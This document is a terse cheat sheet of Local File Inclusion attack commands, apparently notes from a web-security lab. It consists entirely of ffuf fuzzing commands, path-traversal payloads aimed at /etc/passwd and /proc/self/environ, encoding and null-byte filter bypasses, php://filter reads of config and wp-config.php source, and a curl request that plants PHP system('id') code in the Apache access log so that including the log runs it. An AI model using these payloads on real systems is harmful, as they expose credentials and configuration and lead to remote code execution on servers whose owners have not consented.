ffuf -w /opt/useful/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287
?page=/proc/self/environ #for dokcer
?page=../../../../etc/passwd
curl http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/envvars
?page=....//....//etc/passwd
?page=....\/....\/etc/passwd
?page=....//....//....//....//etc/passwd
?page=..%2F..%2F..%2F..%2Fetc%2Fpasswd
?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd
?page=../../../../etc/passwd%00
ffuf -w /opt/useful/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287
/index.php?language=php://filter/read=convert.base64-encode/resource=config
?page=/var/www/html/config.php
?page=../../../../var/www/html/wp-config.php
/index.php?language=php://filter/read=convert.base64-encode/resource=config
echo "BASE64_OUTPUT" | base64 -d
curl "http://<SERVER_IP>:<PORT>/?page=<?php system('id'); ?>"
?page=/var/log/apache2/access.log